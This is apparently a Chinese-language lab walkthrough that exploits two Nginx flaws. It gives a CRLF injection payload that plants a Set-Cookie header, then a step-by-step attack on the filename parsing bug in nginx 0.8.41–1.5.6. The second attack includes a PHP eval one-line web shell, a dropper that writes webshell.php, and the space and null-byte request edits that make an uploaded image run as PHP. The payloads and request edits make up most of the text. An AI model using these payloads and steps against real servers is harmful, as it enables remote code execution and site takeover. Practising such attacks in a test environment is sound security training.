一、CRLF注入漏洞

原理：Nginx將傳入的url進行解碼，對其中的%0a%0d替換成換行符，導致后面的數據注入至頭部，造成CRLF 注入漏洞

1、開環境

2、訪問網站，并抓包

3、構造請求頭

%0ASet-cookie:JSPSESSID%3D1?

這樣就可以看到響應頭里有我們剛剛添加的cookie了

二、文件名邏輯漏洞

原理：非法字符空格和截止符（\0）會導致Nginx解析URI時的有限狀態機混亂，此漏洞可導致目錄跨越及代碼執行，其影響版本為：nginx 0.8.41 – 1.5.6

1、開環境

2、制造木馬

在我們本地新建一個1.jpg（因為這里只能上傳圖片文件）里面寫入一句話木馬

<?php @eval($_POST[cmd]);?>

3、上傳木馬，抓包

4、修改數據包

在文件名的最后加個空格，就可以把木馬上傳進去

5、放行，訪問木馬

這里看到木馬已經上傳進去了

（1）直接訪問是訪問不到的，我們需要在文件名后加...php然后抓包

（2）抓到包之后修改數據包，把2e 2e 2e修改為20 00 2e

（3）放行

修改完成之后放行就可以訪問到木馬了

6、測試連接

這里發現我們的木馬文件雖然傳上去了，但是因為我們的木馬文件被編碼了，所以直接連是連不上的，所以我們需要重新構造木馬文件

7、重新構造文件上傳

這串代碼的意思是：在當前目錄生成一個webshell.php文件，里面是一句話木馬

<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

上傳2.jpg，抓包，加空格，放行

訪問剛剛上傳的文件，這一步是為了執行代碼

/uploadfiles/2.jpg...php

還是抓包，修改為20 00 2e

執行成功之后去訪問我們木馬里寫的webshell.php文件

8、訪問成功，測試連接